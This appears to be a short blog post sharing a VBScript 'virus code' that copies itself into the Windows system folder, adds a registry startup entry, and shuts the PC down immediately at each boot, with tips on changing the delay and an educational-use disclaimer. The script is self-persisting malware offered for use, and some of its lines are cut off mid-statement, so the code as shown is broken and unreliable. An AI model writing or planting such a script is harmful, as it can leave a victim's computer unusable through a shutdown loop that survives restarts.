This is a VBScript code i have written which will shutdown your PC on startup...
You can change the shutdown time...
This script is meant solely for educational purpose and i shall not be held responsible for any misuse....
Save the code in a file with extension as .vbe or .vbs
Dim fso, wsh
Set wsh = WScript.CreateObject("WScript.Shell")
Set fso = WScript.CreateObject("Scripting.FileSyst
If Not fso.FileExists(fso.GetSpecialFolder(1) & "\" & WScript.ScriptName) Then
fso.CopyFile WScript.ScriptFullName, fso.GetSpecialFolder(1) & "\"
End If
wsh.RegWrite "HKEY_LOCAL_MACHINE\SOFTWARE\MICROSOFT\W
fso.GetSpecialFolder(1) & "\" & WScript.ScriptName
wsh.Run "shutdown -s -t 0"
A link to download this file:
Change the line below for different shutdown timings in secs...
wsh.Run "shutdown -s -t 10"
To abort shutdown type "shutdown -a" in Run
Note:
Guys and all the beauties visiting my Blog plz take a note that I cannot be held responsible for any misuse or mishandling of any tricks or virus codes.
You can use them if and only if you are confident enough and able to take responsibility for any outcome.
You can use them if and only if you are confident enough and able to take responsibility for any outcome.
0 comments:
Post a Comment